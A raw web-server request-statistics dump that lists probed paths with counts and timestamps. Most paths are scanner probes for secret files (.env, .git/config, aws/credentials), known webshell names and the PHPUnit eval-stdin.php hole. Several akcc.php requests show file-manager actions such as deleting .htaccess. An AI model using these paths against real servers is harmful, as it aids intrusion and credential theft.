0 2 0 0 29153336 0 0 29126052 0 /js/kcfinder/upload.php 1 0 0 0 1 0 0 29333397 0 0 29333397 0 /jsp.php 1 0 0 0 1 0 0 29298746 0 0 29298746 0 /.well-known/security.txt?165.232.149.232 1 0 0 0 7 0 0 29378026 0 0 29293088 0 /des.php 1 0 0 0 5 0 0 29385065 0 0 29309619 0 /vanta.php 1 0 0 0 1 0 0 28896692 0 0 28896692 0 /api/.git/config?54.202.183.123 1 0 0 0 1 0 0 29211743 0 0 29211743 0 /.tmb/mariju.php 1 0 0 0 25 0 0 29373003 0 0 28845585 0 /.env 1 0 0 0 2 0 0 29387855 0 0 29375823 0 /c4.php 1 0 0 1 1 0 29250912 29250913 0 29250912 29250913 0 /akcc.php?p=cgi-bin&upload= 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /shared/.env 1 0 0 0 1 0 0 29346558 0 0 29346558 0 /saiga.php 1 0 0 0 2 0 0 29153337 0 0 29126053 0 /assets/lib/jquery-file-upload/server/php/ 1 0 0 0 6 0 0 29373838 0 0 29356548 0 /mpxct.php 1 0 0 0 1 0 0 29272324 0 0 29272324 0 /.git/objects/ 1 0 0 0 1 0 0 29293088 0 0 29293088 0 /xBrain.php 1 0 0 0 2 0 0 29387855 0 0 29375823 0 /667.php 1 0 0 0 1 0 0 29346558 0 0 29346558 0 /bild.php 1 0 0 0 3 0 0 29416384 0 0 29370907 0 /wp-includes/block-patterns/index.php 1 5 0 0 0 29285163 0 0 29285163 0 0 435 /.well-known/acme-challenge/aheYwllwiEWRUZa5OpAbmZAvt9N6cjbb8751sMU4xBU 1 0 0 0 1 0 0 29373838 0 0 29373838 0 /1vbqo.php 1 0 0 0 1 0 0 29272325 0 0 29272325 0 /lab 1 0 0 0 1 0 0 29250912 0 0 29250912 0 /akcc.php?del=acme-challenge&p=.well-known 1 0 0 0 3 0 0 29387855 0 0 29293088 0 /rsnu.php 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /ioxi-o1.php 1 0 0 0 1 0 0 29346559 0 0 29346559 0 /hex.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /core/dataaccess/tablemetadata.php 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /qqq.php 1 0 0 0 1 0 0 29333629 0 0 29333629 0 /chn.php 1 0 0 0 11 0 0 29408500 0 0 29278603 0 /v.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /rest/.env 1 0 0 0 6 0 0 29398488 0 0 29211738 0 /dropdown.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /config/mailgun.json 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /test_phpinfo1.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /zxasd.php 1 0 0 0 1 0 0 29372535 0 0 29372535 0 /shell.php?46.101.225.202 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /covert_shell.php 1 1 1 0 1 29250911 0 29250911 29250911 0 29250911 600 /.well-known/acme-challenge/ 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /kairolin.php 1 0 0 0 7 0 0 29416384 0 0 29365340 0 /wp-admin/js/wp-conflg.php?p= 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /service/email_service.py 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /wp-content/plugins/dummyyummy/wp-signup.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /wp-admin/includes/update-core.php 1 0 0 0 2 0 0 29278602 0 0 29211739 0 /wp-admin/install.php 1 0 0 0 3 0 0 29408500 0 0 29356548 0 /owl.php 1 0 0 0 7 0 0 29408500 0 0 29309619 0 /ahax.php 1 0 0 0 2 0 0 29408500 0 0 29386605 0 /bkxzo.php 1 0 0 0 5 0 0 29408500 0 0 29293088 0 /default.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /wp-includes/class-wp.php 1 0 0 0 4 0 0 29360412 0 0 29345118 0 /haa.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /wp-config.txt 1 0 0 0 2 0 0 29153337 0 0 29126053 0 /assets/libs/jquery-file-upload/server/php/ 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /aspshell.asp 1 0 0 0 2 0 0 29373838 0 0 29370907 0 /fesa.php 1 0 0 0 4 0 0 29416384 0 0 29333629 0 /class-t.api.php 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /lib/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29293088 0 0 29293088 0 /va.php 1 0 0 0 4 0 0 29416384 0 0 29368526 0 /class.php 1 0 0 0 3 0 0 29398488 0 0 29356548 0 /article.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /laravel9/phpinfo.php 1 0 0 0 19 0 0 29405694 0 0 28845585 0 /cgi-bin/ 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /aw.php 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /wp-includes/css/kses.php 1 0 0 0 4 0 0 29387855 0 0 29337748 0 /456.php 1 0 0 0 1 0 0 29272325 0 0 29272325 0 /telescope 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /includes/includes.php 1 0 0 0 1 0 0 29408500 0 0 29408500 0 /wp-admin/maint/wp-is.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /q.php 1 0 0 0 2 0 0 29282790 0 0 29267995 0 /_profiler/phpinfo/info.php 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /wp-content/themes/twentytwentytwo/index.php?p= 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /click.php 1 0 0 0 2 0 0 29368526 0 0 29333629 0 /hn.php 1 0 0 0 1 0 0 29181388 0 0 29181388 0 /_fragment%3F_path=what=-1&_controller=phpinfo&_hash=PJKZTykFk9HjPoH4H6ZxRbyJs0b5lS70K1bzuuO1Lg4= 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /www/.env 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /wp-admin/includes/xmrlpc.php?p= 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /wp-includes/Requests/Text/admin.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /aws/credentials 1 0 0 0 1 0 0 29267994 0 0 29267994 0 /.env.txt/html/.env 1 0 0 0 2 0 0 29272325 0 0 29267995 0 /.env.swp 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /wp-wlx.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /class629.php 1 0 0 0 5 0 0 29171761 0 0 28997104 0 /account 1 0 0 0 11 0 0 29416384 0 0 29342550 0 /wsd.php 1 0 0 0 1 0 0 29211741 0 0 29211741 0 /erin1.PhP7 1 0 0 0 1 0 0 29408500 0 0 29408500 0 /png.php 1 0 0 0 1 0 0 29408500 0 0 29408500 0 /wp-content/themes/sketch/404.php 1 0 0 0 7 0 0 29408500 0 0 29337748 0 /12.php 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /f-401.php 1 0 0 0 1 0 0 29278604 0 0 29278604 0 /admin/controller/common/menu.php 1 0 0 0 2 0 0 29408500 0 0 29368526 0 /wp-includes/IXR/about.php 1 0 0 0 6 0 0 29416384 0 0 29356548 0 /mail.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /jga.php 1 0 0 0 2 0 0 29153338 0 0 29126053 0 /media/mediamgr/other/jq_fileupload/server/php/ 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /sql.php 1 0 0 0 1 0 0 29277842 0 0 29277842 0 /.well-known/acme-challenge/atomlib.php 1 0 0 0 1 0 0 29408500 0 0 29408500 0 /wp-admin/css/colour.php 1 0 0 0 6 0 0 29289527 0 0 29272324 0 /.production 1 0 0 0 6 0 0 29387855 0 0 29337748 0 /6.php 1 0 0 0 3 0 0 29416384 0 0 29398488 0 /index/function.php 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 9 0 0 29416384 0 0 29309619 0 /ar.php 1 0 0 0 20 0 0 29401288 0 0 29024062 0 /wp1/wp-includes/wlwmanifest.xml 1 0 0 0 5 0 0 29385065 0 0 29356548 0 /filer.php 1 0 0 0 12 0 0 29171762 0 0 28997104 0 /wp 1 1 1 0 0 29267995 0 0 29267995 0 0 610 /?pp=enable&pp=env 1 0 0 0 2 0 0 29374986 0 0 29272323 0 /.git/logs/HEAD 1 0 0 0 20 0 0 29401288 0 0 29024062 0 /site/wp-includes/wlwmanifest.xml 1 0 0 0 2 0 0 29387855 0 0 29373838 0 /7h.php 1 0 0 0 3 0 0 29387855 0 0 29346559 0 /witmm.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /auth/login 1 0 0 0 3 0 0 29387855 0 0 29278603 0 /l.php 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /xaz.php 1 0 0 0 2 0 0 29360412 0 0 29356548 0 /hi.php 1 0 0 0 2 0 0 29408500 0 0 29386605 0 /n3.php 1 0 0 0 2 0 0 29360411 0 0 29356548 0 /php8.php 1 0 0 0 3 0 0 29356079 0 0 29333397 0 /aa21.php 1 0 0 0 9 0 0 29416384 0 0 29365340 0 /wp-admin/wp-conflg.php?p= 1 0 0 0 4 0 0 29387855 0 0 29333630 0 /Okxob.php 1 0 0 0 1 0 0 29356078 0 0 29356078 0 /moo.php 1 0 0 0 2 0 0 29408500 0 0 29333629 0 /auth.php 1 1 0 0 0 29021288 0 0 29021288 0 0 64 /.well-known/acme-challenge/V5WJ-P9F0TXZ2_KUJP9VC56LD2VQZB8J?198.235.24.142 1 0 0 0 5 0 0 29289528 0 0 29267995 0 /administrator/.env 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.env.travis 1 0 0 0 1 0 0 29278604 0 0 29278604 0 /0day.php 1 1 0 0 0 29109304 0 0 29109304 0 0 64 /.well-known/acme-challenge/05I27BZ25K77ZZ6KRLKDW0TBFZ86ESOT 1 0 0 0 2 0 0 29375823 0 0 29375823 0 /rtg.php 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /cmdshell.php 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /shell.cgi 1 0 0 1 1 0 29250911 29250912 0 29250911 29250912 0 /akcc.php?del=.htaccess&p= 1 1 0 0 1 29250911 0 29250912 29250911 0 29250912 568 /akcc.php?img=favicon 1 0 0 0 11 0 0 29416384 0 0 29333397 0 /file7.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /wpfile.php 1 0 0 0 2 0 0 29387855 0 0 29309619 0 /rak.php 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /themes/twentytwentytwo/index.php 1 2 0 0 0 29373004 0 0 29373004 0 0 844 /_autoindex/assets/icons/file.svg 1 0 0 0 16 0 0 29416384 0 0 29333396 0 /1.php 1 0 0 0 2 0 0 29282790 0 0 29267995 0 /laravel/core/.env 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /static/js/2.ca066a4b.chunk.js 1 0 0 0 2 0 0 29408500 0 0 29333629 0 /wp-load.php 1 0 0 0 5 0 0 29171762 0 0 28997105 0 /test 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /wp-admin/oiko6u.php 1 0 0 0 7 0 0 29408500 0 0 29293088 0 /file.php 1 0 0 0 6 0 0 29416384 0 0 29278602 0 /g.php 1 0 0 0 1 0 0 29378026 0 0 29378026 0 /end.php 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /r57shell.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /swagger.js 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /fv.php 1 0 0 0 12 0 0 29386605 0 0 29293088 0 /gm.php 1 0 0 0 1 0 0 29378026 0 0 29378026 0 /0%25.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /backend/config/development.yml 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /cmdexec.php 1 1 0 0 0 29197143 0 0 29197143 0 0 64 /.well-known/acme-challenge/PZ4WYBB1H9K4RLLGH-9CD5N54M4AMREK 1 0 0 0 1 0 0 29272325 0 0 29272325 0 /database 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /controller/admin/post.js 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /code.php 1 0 0 0 24 0 0 29416384 0 0 29293088 0 /lv.php 1 0 0 0 1 0 0 29373003 0 0 29373003 0 /webjars/swagger-ui/ 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /phpinfo4.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /obfuscated_shell.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /ymq4nt.php 1 0 0 0 2 0 0 29408500 0 0 29368526 0 /menu.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /secret_shell.php 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /wp-includes/assets/index.php 1 0 0 0 13 0 0 29408500 0 0 29333397 0 /a2.php 1 0 0 0 15 0 0 29387855 0 0 29293088 0 /file2.php 1 70 0 0 0 29373004 0 0 28845585 0 0 24900 /_autoindex/assets/js/tablesort.number.js 1 0 0 0 3 0 0 29368526 0 0 29356548 0 /ini.php 1 0 0 0 34 0 0 29329343 0 0 28880891 0 /ads.txt 1 0 0 0 5 0 0 29364333 0 0 29250064 0 /test.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /command_shell.php 1 0 0 0 2 0 0 29278602 0 0 29278602 0 /shell.asp 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /wp-gif.php 1 0 0 0 1 0 0 29272325 0 0 29272325 0 /v2 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /modules/modules.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /rex.php 1 0 0 0 2 0 0 29416384 0 0 29378026 0 /xv.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /xampp/.env 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /xlluw.php 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /b.php 1 0 0 0 7 0 0 29373003 0 0 28845585 0 /server-status 1 0 0 0 1 0 0 29293088 0 0 29293088 0 /ez.php 1 0 0 0 3 0 0 29408500 0 0 29211739 0 /wp-content/uploads/index.php 1 0 0 0 1 0 0 29378026 0 0 29378026 0 /zeal.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /sms.py 1 0 0 0 1 0 0 29250064 0 0 29250064 0 /tool/view/phpinfo.view.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /class5.php 1 0 0 0 1 0 0 28896692 0 0 28896692 0 /common/.git/config 1 0 0 0 18 0 0 29375408 0 0 29024062 0 /news/wp-includes/wlwmanifest.xml 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /ww1.php 1 0 0 0 3 0 0 29381387 0 0 29337748 0 /ova.php 1 0 0 0 1 0 0 29265800 0 0 29265800 0 /blog/ 1 0 0 0 2 0 0 29153336 0 0 29126052 0 /asset/kcfinder/upload.php 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /aspxshell.aspx 1 0 0 0 5 0 0 29171762 0 0 28997105 0 /temp 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /wp-admin/includes/update.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /sh.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /crew.php 1 0 0 0 7 0 0 29373003 0 0 28845585 0 /telescope/requests 1 0 0 0 3 0 0 29408500 0 0 29378026 0 /wp-is.php 1 0 0 0 1 0 0 29368526 0 0 29368526 0 /mar.php 1 0 0 0 1 0 0 29333397 0 0 29333397 0 /anan.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /web.php 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /ac.php 1 0 0 0 8 0 0 29408500 0 0 29333397 0 /f6.php 1 0 0 0 7 0 0 29408500 0 0 29333397 0 /NewFile.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /live_env 1 0 0 0 1 0 0 29126054 0 0 29126054 0 /node_modules/jquery.filer/php/readme.txt 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /lib/phpunit/phpunit/Util/PHP/eval-stdin.php 1 1 0 0 0 29373002 0 0 29373002 0 0 64 /.well-known/acme-challenge/OIXGSLLWM1L5UYOCQR3NXGRWQNRMFC8J 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /wp-includes/ID3/about.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /configs/application.ini 1 0 0 0 2 0 0 29267995 0 0 29116976 0 /.phpinfo 1 26 26 0 3 29410417 0 29049337 29002715 0 29039410 18284 /?46.101.225.202 1 1 0 1 0 29250911 29250912 0 29250911 29250912 0 8656 /akcc.php?p=.well-known 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /bb5.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.env~ 1 0 0 0 2 0 0 29408500 0 0 29368526 0 /himu.php 1 0 0 0 7 0 0 29373003 0 0 28845585 0 /debug/default/view?panel=config 1 0 0 0 6 0 0 29289527 0 0 29272325 0 /core/app/.env 1 0 0 0 3 0 0 29381387 0 0 29337748 0 /ll.php 1 0 0 0 2 0 0 29360412 0 0 29356548 0 /akk.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /node_modules/.env 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.envs 1 0 0 0 5 0 0 29364333 0 0 29250064 0 /phpinfo.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /phpinfo.php5 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /env/.env 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /phpinfo.php4 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /w1w.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /strubbly.php 1 0 0 0 2 0 0 29282790 0 0 29116976 0 /aws.yml 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /backend/config/default.yml 1 0 0 0 1 0 0 29126054 0 0 29126054 0 /node_modules/jquery-filer/php/readme.txt 1 0 0 0 6 0 0 29289528 0 0 29272325 0 /laravel/.env 1 0 0 0 1 0 0 29346559 0 0 29346559 0 /f1.php 1 0 0 0 20 0 0 29401288 0 0 29024062 0 /shop/wp-includes/wlwmanifest.xml 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /wp-asd.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /xl.php 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /1aa.php 1 0 0 0 1 0 0 29333629 0 0 29333629 0 /sts.php 1 0 0 0 1 0 0 29368526 0 0 29368526 0 /as/function.php 1 0 0 0 2 0 0 29282790 0 0 29267995 0 /.aws/config 1 0 0 0 1 0 0 29378026 0 0 29378026 0 /1wx.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /wp-content/themes/pridmag/db.php?u 1 0 0 0 2 0 0 29386605 0 0 29293088 0 /wio.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /configs/routes.js 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /templates/templates.php 1 0 0 0 18 0 0 29375408 0 0 29024062 0 /wp2/wp-includes/wlwmanifest.xml 1 0 0 0 6 0 0 29387855 0 0 29309619 0 /bless2.php 1 0 0 0 2 0 0 29153337 0 0 29126053 0 /tinymce/plugins/filemanager/dialog.php 1 0 0 0 1 0 0 29122085 0 0 29122085 0 /favicon.ico?164.90.228.79 1 0 0 0 3 0 0 29356079 0 0 29333397 0 /ckk.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /btk.php 1 5 0 0 0 29109308 0 0 29109308 0 0 435 /.well-known/acme-challenge/Y1A93b0zbSJttFKTjv0tDNbrR-OJizRieldSJRp1HQ8 1 0 0 0 1 0 0 28896692 0 0 28896692 0 /public/.git/config 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /AnonymousFox.php 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /moon.php?p= 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /admin.php?p= 1 0 0 0 1 0 0 29346558 0 0 29346558 0 /xex.php 1 0 0 0 1 0 0 29272326 0 0 29272326 0 /en 1 0 0 0 2 0 0 29153337 0 0 29126053 0 /js/jquery-file-upload/server/php/ 1 0 0 0 7 0 0 29408500 0 0 29333629 0 /tgrs.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /client/.env 1 0 0 0 5 0 0 29289527 0 0 29272324 0 /lab/.env 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /scripts/phpinfo 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /wp-content/plugins/pwnd/as.php 1 0 0 0 1 0 0 29373003 0 0 29373003 0 /api/graphql 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /admin/controllers/partner.js 1 0 0 0 9 0 0 29408500 0 0 29211738 0 /mah.php 1 0 0 0 6 0 0 29373003 0 0 28933444 0 /actuator/env 1 0 0 0 5 0 0 29266066 0 0 29131679 0 /wp-admin/setup-config.php?step=1&language=en_EN 1 0 0 0 6 0 0 29289527 0 0 29272324 0 /.local 1 0 0 0 3 0 0 29408500 0 0 29333629 0 /ftp.php 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /css/colors/blue/index.php 1 0 0 0 2 0 0 29282790 0 0 29267995 0 /docker/.env 1 0 0 0 1 0 0 29378026 0 0 29378026 0 /rei.php 1 0 0 0 16 0 0 29408500 0 0 29267995 0 /wp.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /newinfo.php 1 0 0 0 1 0 0 29284082 0 0 29284082 0 /.vscode/sftp.json?165.232.149.232 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /fb.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /zex.php 1 0 0 0 3 0 0 29385065 0 0 29383755 0 /gorila.php 1 0 0 0 2 0 0 29378026 0 0 29333397 0 /keu.php 1 0 0 0 5 0 0 29266066 0 0 29131679 0 /wordpress/wp-admin/setup-config.php?step=1&language=en_EN 1 0 0 0 2 0 0 29360412 0 0 29356548 0 /finny.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /development/.env.local 1 0 0 0 2 0 0 29386605 0 0 29378026 0 /yanki.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /dev/phpinfo.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.env1 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /admin/server_info.php 1 0 0 0 11 0 0 29373003 0 0 28845585 0 /.vscode/sftp.json 1 0 0 0 4 0 0 29387855 0 0 29337748 0 /kk.php 1 0 0 0 1 0 0 29373838 0 0 29373838 0 /f2r4.php 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /c99shell.php 1 0 0 0 1 0 0 28896692 0 0 28896692 0 /bower_components/.git/config 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /wp-admin/includes/file.php 1 0 0 0 1 0 0 29373003 0 0 29373003 0 /graphql 1 4 0 0 0 29021312 0 0 29021312 0 0 348 /.well-known/acme-challenge/NVib8IBYv44zzR8mrBYFAUTOk_aHV3ixYYY3sCof62Y 1 0 0 0 3 0 0 29387855 0 0 29356548 0 /wsr2.php 1 0 0 0 2 0 0 29387855 0 0 29309619 0 /aaaa.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /test_info1.php 1 0 0 0 1 0 0 29378026 0 0 29378026 0 /pt.php 1 0 0 2 5 0 29250911 29408500 0 29250910 29333397 0 /akcc.php 1 0 0 0 1 0 0 29378026 0 0 29378026 0 /888.php 1 0 0 0 1 0 0 29333397 0 0 29333397 0 /ddgg.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /bluejackets.php 1 1 0 0 1 29250912 0 29250912 29250912 0 29250912 200311 /akcc.php?p=&view=akcc.php 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /termps.php 1 0 0 0 1 0 0 29373003 0 0 29373003 0 /v3/api-docs 1 0 0 0 1 0 0 29333397 0 0 29333397 0 /wk.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /wteed.php 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /security.php 1 0 0 0 2 0 0 29387855 0 0 29386605 0 /Sanskrit.php 1 0 0 0 2 0 0 29408500 0 0 29333397 0 /lol.php 1 0 0 0 3 0 0 29190077 0 0 29172778 0 /wp-login.php?165.232.149.232 1 0 0 0 1 0 0 29267994 0 0 29267994 0 /config/default.json 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /ef.php 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /phpunit/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29228733 0 0 29228733 0 /moddofuns.php 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /hob.php 1 0 0 0 21 0 0 29401288 0 0 29024062 0 /web/wp-includes/wlwmanifest.xml 1 0 0 0 3 0 0 29386605 0 0 29356548 0 /miso.php 1 0 0 0 1 0 0 29378026 0 0 29378026 0 /alfa-rex.php7 1 0 0 0 1 0 0 29378026 0 0 29378026 0 /Jcrop.php 1 0 0 0 2 0 0 29408500 0 0 29368526 0 /wp-includes/style-engine/index.php 1 0 0 0 1 0 0 29211742 0 0 29211742 0 /cgi-bin/wp-login.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /new/.env.staging 1 0 0 0 4 0 0 29296520 0 0 29226101 0 /wp-admin/install.php?step=1 1 0 0 0 1 0 0 29032419 0 0 29032419 0 /old?198.235.24.142 1 0 0 0 3 0 0 29282790 0 0 29267995 0 /.env_sample 1 0 0 1 0 0 29250912 0 0 29250912 0 0 /akcc.php?copy=cgi-bin&p=.well-known 1 0 0 0 5 0 0 29370906 0 0 29345118 0 /wlex.php 1 0 0 0 6 0 0 29398488 0 0 29337748 0 /fm.php?p= 1 0 0 0 7 0 0 29416384 0 0 29211738 0 /wp-admin/about.php 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /bge.php 1 0 0 0 3 0 0 29385065 0 0 29383755 0 /sh3ll.php 1 0 0 0 9 0 0 29408500 0 0 29345118 0 /33.php 1 0 0 0 1 0 0 29250913 0 0 29250913 0 /akcc.php?edit=akcc.php&env=ace&p= 1 0 0 0 1 0 0 29373838 0 0 29373838 0 /l10n.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /env.txt 1 0 0 0 6 0 0 29289528 0 0 29272325 0 /admin/.env 1 0 0 0 4 0 0 29416384 0 0 29370907 0 /wp-admin/js/index.php 1 0 0 0 4 0 0 29373838 0 0 29365340 0 /fso.php 1 0 0 0 1 0 0 29346559 0 0 29346559 0 /d4.php 1 0 0 0 2 0 0 29272325 0 0 29267995 0 /.env.backup 1 0 0 0 1 0 0 29333397 0 0 29333397 0 /wf.php 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /ave.php 1 0 0 0 1 0 0 29368526 0 0 29368526 0 /file22.php 1 0 0 0 8 0 0 29416384 0 0 29370907 0 /wp-freya.php 1 0 0 0 2 0 0 29408500 0 0 29368526 0 /log.php 1 0 0 0 2 0 0 29278602 0 0 29211739 0 /wp-content/about.php 1 0 0 0 14 0 0 29408500 0 0 29293088 0 /atomlib.php 1 7 7 0 0 29373003 0 0 28845585 0 0 4367 /?rest_route=/wp/v2/users/ 1 0 0 0 1 0 0 29333629 0 0 29333629 0 /cs.php 1 0 0 0 2 0 0 29360412 0 0 29356548 0 /ea.php 1 0 0 0 3 0 0 29401288 0 0 29145055 0 /feed/ 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /test/phpinfo.php 1 0 0 0 7 0 0 29408500 0 0 29333629 0 /shoha.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /administrator/components/com_admin/models/sysinfo.php 1 0 0 0 8 0 0 29385065 0 0 29356078 0 /afile.php 1 0 0 0 14 0 0 29416384 0 0 29333397 0 /class20.php 1 0 0 0 9 0 0 29416384 0 0 29333397 0 /class19.php 1 0 0 0 1 0 0 29116976 0 0 29116976 0 /_profiler/info 1 5 0 0 0 28845584 0 0 28845583 0 0 435 /.well-known/acme-challenge/WQTgW-rmqEkE9SnNRe_pELZIdHRlGfbPPmSPnMqMZBY 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 3 0 0 29378026 0 0 29345118 0 /vast.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.environment 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /upload.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /api/config.js 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /remote.php 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /plugins/Cache/footer.php 1 0 0 0 1 0 0 29272325 0 0 29272325 0 /admin 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /info.php.1 1 2 0 0 0 28886583 0 0 28876566 0 0 4642 /_autoindex/assets/js/tablesort.js?54.202.183.123 1 0 0 0 2 0 0 29408500 0 0 29333629 0 /test2.php 1 0 0 0 2 0 0 29398488 0 0 29293088 0 /wp-includes/certificates/plugins.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /ngek.php 1 0 0 0 2 0 0 29375823 0 0 29370906 0 /18299.php 1 0 0 0 1 0 0 